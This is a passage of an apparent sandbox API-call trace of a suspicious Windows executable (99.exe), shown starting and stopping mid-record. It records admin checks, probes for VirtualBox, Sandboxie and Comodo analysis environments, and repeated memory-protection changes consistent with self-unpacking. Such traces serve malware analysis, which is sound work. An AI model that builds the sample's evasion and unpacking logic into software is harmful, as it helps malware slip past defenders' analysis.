0x300000 [0264.514] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x410) returned 0x324e08 [0264.514] GetProcessHeap () returned 0x300000 [0264.514] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x10) returned 0x314a20 [0264.514] GetCurrentDirectoryW (in: nBufferLength=0x208, lpBuffer=0x324e08 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 0x25 [0264.514] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3249f0, nSize=0x208 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0264.514] SetCurrentDirectoryW (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 1 [0264.516] GetCurrentThreadId () returned 0xc84 [0264.516] OpenThread (dwDesiredAccess=0x1f03ff, bInheritHandle=0, dwThreadId=0xc84) returned 0x1c [0264.517] GetUserDefaultUILanguage () returned 0x409 [0264.523] GetProcessHeap () returned 0x300000 [0264.523] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1000) returned 0x325850 [0264.524] GetProcessHeap () returned 0x300000 [0264.524] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x10) returned 0x314a38 [0264.526] GetCommandLineA () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0264.528] GetVersion () returned 0x1db10106 [0264.529] SetCurrentDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 1 [0264.529] SetCurrentDirectoryW (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 1 [0264.531] GetCurrentThread () returned 0xfffffffe [0264.532] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x67fa04 | out: TokenHandle=0x67fa04*=0x0) returned 0 [0264.533] GetCurrentProcess () returned 0xffffffff [0264.534] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x67fa04 | out: TokenHandle=0x67fa04*=0xd4) returned 1 [0264.534] GetTokenInformation (in: TokenHandle=0xd4, TokenInformationClass=0x2, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x67aad0 | out: TokenInformation=0x0, ReturnLength=0x67aad0) returned 0 [0264.534] VirtualAlloc (lpAddress=0x0, dwSize=0x140, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.535] GetTokenInformation (in: TokenHandle=0xd4, TokenInformationClass=0x2, TokenInformation=0x2110000, TokenInformationLength=0x140, ReturnLength=0x67aad0 | out: TokenInformation=0x2110000, ReturnLength=0x67aad0) returned 1 [0264.535] CloseHandle (hObject=0xd4) returned 1 [0264.535] AllocateAndInitializeSid (in: pIdentifierAuthority=0x67ba18, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x683c38 | out: pSid=0x683c38*=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x2110074*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x211007c*(Revision=0x15, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x2f, [3]=0x94, [4]=0x7f, [5]=0xfb), SubAuthority=0xfbc24a41)) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x2110084*(Revision=0x41, SubAuthorityCount=0x4a, IdentifierAuthority.Value=([0]=0xc2, [1]=0xfb, [2]=0xb4, [3]=0x36, [4]=0x96, [5]=0xe4), SubAuthority=([0]=0x1, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x1, [5]=0x1, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x1, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x1, [17]=0x1, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x5, [24]=0x72, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x2, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x5, [36]=0x20, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x20, [41]=0x2, [42]=0x0, [43]=0x0, [44]=0x1, [45]=0x2, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x5, [52]=0x20, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x21, [57]=0x2, [58]=0x0, [59]=0x0, [60]=0x1, [61]=0x1, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x5, [68]=0x4, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x1, [73]=0x1))) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x211008c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x2110094*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x101)) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x211009c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x72)) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100a4*(Revision=0x72, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x2, [4]=0x0, [5]=0x0), SubAuthority=0x5000000)) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100ac*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x20, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x220)) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100b4*(Revision=0x20, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x2, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100bc*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x20, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x221)) returned 0 [0264.535] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100c4*(Revision=0x21, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0264.536] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100cc*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x4, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x101)) returned 0 [0264.536] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100d4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x1)) returned 0 [0264.536] EqualSid (pSid1=0x314a50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x21100dc*(Revision=0x1, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=0x5000000)) returned 0 [0264.536] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.537] GetProcAddress (hModule=0x75cb0000, lpProcName="IsUserAnAdmin") returned 0x75d044f5 [0264.538] IsUserAnAdmin () returned 0 [0264.539] GetProcessHeap () returned 0x300000 [0264.539] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x10) returned 0x314a50 [0264.539] GetProcessHeap () returned 0x300000 [0264.539] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x10) returned 0x314a68 [0264.541] GetSystemFirmwareTable (in: FirmwareTableProviderSignature=0x52534d42, FirmwareTableID=0x0, pFirmwareTableBuffer=0x0, BufferSize=0x0 | out: pFirmwareTableBuffer=0x0) returned 0x603 [0264.542] GetProcessHeap () returned 0x300000 [0264.542] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x603) returned 0x326858 [0264.542] GetSystemFirmwareTable (in: FirmwareTableProviderSignature=0x52534d42, FirmwareTableID=0x0, pFirmwareTableBuffer=0x326858, BufferSize=0x603 | out: pFirmwareTableBuffer=0x326858) returned 0x603 [0264.542] GetProcessHeap () returned 0x300000 [0264.542] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x326858) returned 1 [0264.544] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", phkResult=0x683640 | out: phkResult=0x683640*=0xd8) returned 0x0 [0264.544] RegQueryValueExA (in: hKey=0xd8, lpValueName="DriverDesc", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x3cc52f4a | out: lpType=0x0, lpData=0x67c4c0*=0x53, lpcbData=0x67d42c*=0x1e) returned 0x0 [0264.544] RegCloseKey (hKey=0xd8) returned 0x0 [0264.544] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="Hardware\\description\\System", phkResult=0x683640 | out: phkResult=0x683640*=0xd8) returned 0x0 [0264.545] RegQueryValueExA (in: hKey=0xd8, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x200 | out: lpType=0x0, lpData=0x67c4c0*=0x44, lpcbData=0x67d42c*=0x4b) returned 0x0 [0264.545] RegQueryValueExA (in: hKey=0xd8, lpValueName="VideoBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x200 | out: lpType=0x0, lpData=0x67c4c0*=0x44, lpcbData=0x67d42c*=0x200) returned 0x2 [0264.545] RegQueryValueExA (in: hKey=0xd8, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x200 | out: lpType=0x0, lpData=0x67c4c0*=0x44, lpcbData=0x67d42c*=0x4b) returned 0x0 [0264.545] RegCloseKey (hKey=0xd8) returned 0x0 [0264.545] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="HARDWARE\\ACPI\\DSDT\\VBOX__", phkResult=0x683640 | out: phkResult=0x683640*=0x0) returned 0x2 [0264.549] GetModuleHandleA (lpModuleName="cmdvrt32.dll") returned 0x0 [0264.549] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0264.551] VirtualAlloc (lpAddress=0x0, dwSize=0x52c00, flAllocationType=0x1000, flProtect=0x4) returned 0x3440000 [0264.590] VirtualProtect (in: lpAddress=0x401000, dwSize=0x52c00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0264.596] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.620] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.626] VirtualProtect (in: lpAddress=0x401000, dwSize=0x52c00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0264.629] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.754] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x3440000 [0264.755] VirtualProtect (in: lpAddress=0x454000, dwSize=0x17200, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0264.757] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.767] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.770] VirtualProtect (in: lpAddress=0x454000, dwSize=0x17200, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0264.772] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.774] VirtualAlloc (lpAddress=0x0, dwSize=0xe00, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.774] VirtualProtect (in: lpAddress=0x46c000, dwSize=0xe00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0264.775] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0264.775] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.776] VirtualProtect (in: lpAddress=0x46c000, dwSize=0xe00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0264.777] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.778] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.779] VirtualProtect (in: lpAddress=0x470000, dwSize=0x200, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x80) returned 1 [0264.779] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0264.781] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.782] VirtualProtect (in: lpAddress=0x470000, dwSize=0x200, flNewProtect=0x80, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0264.782] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.783] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.784] VirtualProtect (in: lpAddress=0x471000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0264.784] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0264.848] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.853] VirtualProtect (in: lpAddress=0x471000, dwSize=0x400, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0264.854] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.855] VirtualAlloc (lpAddress=0x0, dwSize=0x4c00, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.856] VirtualProtect (in: lpAddress=0x472000, dwSize=0x4c00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0264.857] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0264.859] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.861] VirtualProtect (in: lpAddress=0x472000, dwSize=0x4c00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0264.861] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.862] VirtualAlloc (lpAddress=0x0, dwSize=0x3a00, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0264.866] VirtualProtect (in: lpAddress=0x477000, dwSize=0x3a00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0264.867] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0264.869] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.871] VirtualProtect (in: lpAddress=0x477000, dwSize=0x3a00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0264.871] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.875] VirtualProtect (in: lpAddress=0x469808, dwSize=0xdc, flNewProtect=0x40, lpflOldProtect=0x684e30 | out: lpflOldProtect=0x684e30*=0x40) returned 1 [0264.876] VirtualProtect (in: lpAddress=0x454000, dwSize=0x49c, flNewProtect=0x40, lpflOldProtect=0x67fd0c | out: lpflOldProtect=0x67fd0c*=0x40) returned 1 [0264.878] VirtualProtect (in: lpAddress=0x454000, dwSize=0x494, flNewProtect=0x40, lpflOldProtect=0x684a0c | out: lpflOldProtect=0x684a0c*=0x40) returned 1 [0264.884] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75cb0000 [0264.884] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x773b0000 [0264.885] GetModuleHandleA (lpModuleName="GDI32.dll") returned 0x77240000 [0264.886] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76c20000 [0264.886] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x771d0000 [0264.887] GetModuleHandleA (lpModuleName="gdiplus.dll") returned 0x6c5c0000 [0264.888] GetModuleHandleA (lpModuleName="WINMM.dll") returned 0x6bed0000 [0264.888] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x75610000 [0264.889] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x769b0000 [0264.890] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x75a80000 [0264.890] VirtualAlloc (lpAddress=0x0, dwSize=0xaca8, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0265.149] GetProcAddress (hModule=0x75610000, lpProcName=0x73) returned 0x75613ab2 [0265.152] GetProcAddress (hModule=0x779e0000, lpProcName="RtlEnterCriticalSection") returned 0x77a022b0 [0265.153] GetProcAddress (hModule=0x75610000, lpProcName=0x13) returned 0x75616f01 [0265.153] GetProcAddress (hModule=0x779e0000, lpProcName="RtlLeaveCriticalSection") returned 0x77a02270 [0265.154] GetProcAddress (hModule=0x75610000, lpProcName=0x17) returned 0x75613eb8 [0265.155] GetProcAddress (hModule=0x75610000, lpProcName=0x37) returned 0x75626ef3 [0265.155] GetProcAddress (hModule=0x779e0000, lpProcName="RtlAllocateHeap") returned 0x77a0e026 [0265.156] GetProcAddress (hModule=0x75610000, lpProcName=0x38) returned 0x75626d62 [0265.157] GetProcAddress (hModule=0x75610000, lpProcName=0x34) returned 0x75627673 [0265.158] GetProcAddress (hModule=0x75610000, lpProcName=0x3) returned 0x75613918 [0265.158] GetProcAddress (hModule=0x75610000, lpProcName=0xc) returned 0x7561b131 [0265.159] GetProcAddress (hModule=0x75610000, lpProcName=0xb) returned 0x7561311b [0265.159] GetProcAddress (hModule=0x75610000, lpProcName=0xf) returned 0x75612d8b [0265.160] GetProcAddress (hModule=0x75610000, lpProcName=0x8) returned 0x75612d57 [0265.160] GetProcAddress (hModule=0x75610000, lpProcName=0x4) returned 0x75616bdd [0265.161] GetProcAddress (hModule=0x75610000, lpProcName=0x70) returned 0x756137d9 [0265.161] GetProcAddress (hModule=0x75610000, lpProcName=0x6f) returned 0x756137ad [0265.162] GetProcAddress (hModule=0x75610000, lpProcName=0x33) returned 0x75626c01 [0265.163] GetProcAddress (hModule=0x75610000, lpProcName=0x10) returned 0x75616b0e [0265.163] GetProcAddress (hModule=0x75610000, lpProcName=0x9) returned 0x75612d8b [0265.167] GetProcAddress (hModule=0x779e0000, lpProcName="RtlDeleteCriticalSection") returned 0x77a145f5 [0265.213] GetProcAddress (hModule=0x779e0000, lpProcName="RtlEncodePointer") returned 0x77a20fcb [0265.214] GetProcAddress (hModule=0x779e0000, lpProcName="RtlInitializeCriticalSection") returned 0x77a12c42 [0265.215] GetProcAddress (hModule=0x779e0000, lpProcName="RtlInitializeSListHead") returned 0x77a194a4 [0265.216] GetProcAddress (hModule=0x779e0000, lpProcName="RtlDecodePointer") returned 0x77a19d35 [0265.241] GetProcAddress (hModule=0x779e0000, lpProcName="RtlExitUserThread") returned 0x77a3d598 [0265.302] GetProcAddress (hModule=0x779e0000, lpProcName="RtlSizeHeap") returned 0x77a13002 [0265.302] GetProcAddress (hModule=0x779e0000, lpProcName="RtlReAllocateHeap") returned 0x77a21f6e [0265.305] VirtualProtect (in: lpAddress=0x454000, dwSize=0x494, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0265.306] VirtualProtect (in: lpAddress=0x454000, dwSize=0x49c, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0265.307] VirtualProtect (in: lpAddress=0x469808, dwSize=0xdc, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0265.310] VirtualProtect (in: lpAddress=0x400000, dwSize=0x200, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x2) returned 1 [0265.310] VirtualProtect (in: lpAddress=0x400000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0265.313] GetProcessHeap () returned 0x300000 [0265.313] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x10) returned 0x314a80 [0265.313] GetProcessHeap () returned 0x300000 [0265.313] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x10) returned 0x314a98 [0265.314] SetCurrentDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 1 [0265.316] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff6c | out: lpSystemTimeAsFileTime=0x18ff6c*(dwLowDateTime=0xc63b0ce0, dwHighDateTime=0x1d7fb6e)) [0265.316] GetCurrentThreadId () returned 0xc84 [0265.316] GetCurrentProcessId () returned 0xc88 [0265.316] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff64 | out: lpPerformanceCount=0x18ff64*=3099152144318) returned 1 [0265.318] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0265.319] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0265.322] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0265.323] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.323] GetLastError () returned 0x7e [0265.323] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0265.324] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0265.326] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0265.328] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0265.329] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0265.329] GetProcessHeap () returned 0x300000 [0265.329] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.330] GetLastError () returned 0x7e [0265.330] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0265.331] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0265.422] GetLastError () returned 0x7e [0265.423] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0265.423] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x364) returned 0x326a80 [0265.424] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0265.427] SetLastError (dwErrCode=0x7e) [0265.428] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xc00) returned 0x326df0 [0265.430] GetStartupInfoW (in: lpStartupInfo=0x18fe94 | out: lpStartupInfo=0x18fe94*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x432c10, hStdOutput=0x559674c9, hStdError=0xfffffffe)) [0265.431] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0265.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0265.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0265.432] GetCommandLineA () 